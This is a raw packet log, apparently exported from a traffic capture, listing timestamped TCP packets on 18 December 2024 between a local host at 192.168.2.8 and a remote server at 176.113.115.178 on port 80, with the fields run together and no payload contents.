                                                  Dec 18, 2024 14:07:44.178369045 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.179233074 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.179245949 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.179289103 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.248266935 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.248467922 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.248523951 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.248796940 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.248868942 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.248914957 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.249506950 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.249545097 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.249591112 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.250397921 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.250515938 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.250571966 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.251372099 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.251430988 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.251476049 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.251904011 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.252096891 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.252154112 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.252649069 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.252794981 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.252840996 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.253606081 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.253618956 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.253654003 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.254348993 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.254362106 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.254404068 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.255227089 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.255354881 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.255402088 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.256176949 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.256190062 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.256227970 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.256757975 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.256900072 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.256946087 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.258183956 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.258311033 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.258358955 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.258599043 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.258687019 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.258729935 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.259278059 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.259371996 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.259418964 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.260090113 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.260147095 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.260195971 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.261084080 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.261096954 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.261133909 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.261981964 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.262029886 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.262077093 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.262787104 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.263066053 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.263109922 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.263704062 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.263804913 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.263854980 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.264317989 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.264408112 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.264455080 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.265072107 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.265109062 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.265157938 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.265885115 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.265897036 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.265943050 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.266820908 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.266836882 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.266877890 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.267462015 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.267599106 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.267643929 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.268312931 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.268429041 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.268471003 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.269109011 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.269371033 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.269423962 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.270165920 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.270205975 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.270247936 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.271147966 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.271194935 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.271249056 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.271639109 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.271850109 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.271895885 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.272573948 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.272584915 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.272635937 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.273382902 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.273396969 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.273432016 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.274115086 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.274152994 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.274203062 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.274930000 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.275006056 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.275048971 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.275698900 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.275810957 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.275851011 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.276571035 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.276745081 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.276792049 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.277426958 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.277621031 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.277667046 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.278285980 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.278569937 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.278625965 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.279082060 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.279233932 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.279277086 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.280066013 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.280384064 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.280438900 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.280777931 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.280864954 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.280904055 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.281552076 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.281616926 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.281660080 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.282497883 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.282557011 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.282603025 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.283189058 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.283232927 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.283279896 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.284012079 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.284111977 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.284168005 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.284913063 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.284970045 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.285015106 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.285686016 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.285850048 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.286525011 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.286561966 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.286577940 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.286623955 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.287350893 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.287363052 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.287416935 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.288134098 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.331412077 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.348866940 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.348969936 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.349023104 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.349232912 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.349327087 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.349373102 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.349994898 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.350089073 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.350133896 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.350930929 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.351092100 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.351159096 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.351900101 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.351912022 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.351953983 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.352418900 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.352507114 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.352556944 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.353329897 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.353346109 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.353394032 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.354072094 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.354130983 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.354176998 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.354907036 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.354947090 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.355005980 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.355777979 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.355791092 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.355833054 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.356493950 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.356571913 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.356621981 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.357352972 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.357635975 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.357690096 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.358133078 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.358185053 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.358228922 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.358936071 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.409548044 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.416724920 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.416742086 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.416806936 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.417094946 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.417210102 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.417254925 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.417448997 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.418054104 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.418106079 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.418127060 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.418816090 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.418864012 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.419039011 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.419115067 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.419225931 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.419976950 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.419990063 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.420058012 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.420675993 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.420752048 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.420803070 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.421509981 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.421782970 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.421796083 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.421823978 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.422559023 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.422600985 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.422616959 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.423367977 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.423429966 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.423474073 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.424318075 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.424329042 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.424365044 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.425163031 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.425188065 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.425229073 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.426045895 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.426059961 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.426096916 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.426644087 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.426678896 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.426825047 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.427571058 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.427613974 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.427619934 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.428266048 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.428306103 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.428386927 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.429198027 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.429213047 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.429240942 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.429949045 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.429989100 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.430118084 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.430807114 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.430852890 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.430948973 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.431591988 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.431631088 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.431788921 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.432413101 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.432457924 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.432537079 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.433288097 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.433331966 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.433391094 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.434220076 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.434231997 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.434267998 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.435177088 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.435189009 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.435225964 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.435700893 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.435744047 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.436033964 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.436551094 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.436605930 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.436677933 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.437356949 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.437407970 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.437457085 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.438370943 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.438448906 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.438580990 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.439157963 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.439203978 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.439354897 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.439851046 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.439903975 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.439960003 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.440937996 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.440994024 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.441039085 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.441986084 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.442044020 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.442054033 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.442454100 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.442504883 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.442523003 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.443144083 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.443190098 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.443248034 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.444024086 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.444071054 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.444128036 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.444789886 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.444835901 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.444884062 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.445648909 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.445699930 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.445751905 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.446460009 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.446504116 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.446552038 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.447297096 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.447350025 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.447391033 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.448093891 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.448132038 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.448180914 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.449151039 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.449196100 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.541014910 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.541047096 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.541136980 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.541220903 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.541261911 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.541312933 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.542129040 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.542140961 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.542181015 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.543046951 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.543061018 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.543113947 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.543596983 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.543956995 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.544004917 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.544485092 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.544934988 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.544986010 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.545268059 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.545371056 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.545416117 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.546166897 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.546180010 CET8049707176.113.115.178192.168.2.8
